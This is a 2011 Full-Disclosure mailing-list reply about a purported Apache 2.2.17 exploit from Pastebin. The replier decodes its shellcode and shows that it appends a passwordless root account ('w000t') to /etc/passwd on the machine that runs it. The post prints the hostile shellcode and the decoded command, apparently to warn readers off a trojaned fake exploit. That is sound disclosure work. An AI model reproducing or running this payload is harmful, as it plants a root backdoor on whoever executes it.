Re: Apache 2.2.17 exploit?

[VeNoMouS <venom () gen-x co nz>]

char evil[] =  
 "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" 

"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" 

"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" 

"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" 

"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" 

"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" 

"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" 

"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" 

"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" 
 "x44x44"   
.....

execl("/bin/sh", "sh", "-c", evil, 0);  

..... 

/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

AHUH..... 

On Mon,
3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: 

> I regularly trawl
Pastebin.com to find code - often idiots leave some 0day and similar
there and it is nice to find. 
> Well, seeing as I have no test boxes
at the moment, can someone check this code in a VM? I am not sure if it
is legit or not.
> http://pastebin.com/ygByEV2e [1]
>
> Thanks :)

> ~Darren

        * 
char evil[] =  
        * 

"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" 
        * 

"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" 
        * 

"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" 
        * 

"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" 
        * 

"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" 
        * 

"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" 
        * 

"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" 
        * 

"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" 
        * 

"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" 
        * 
 "x44x44"; 




Links:
------
[1] http://pastebin.com/ygByEV2e

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/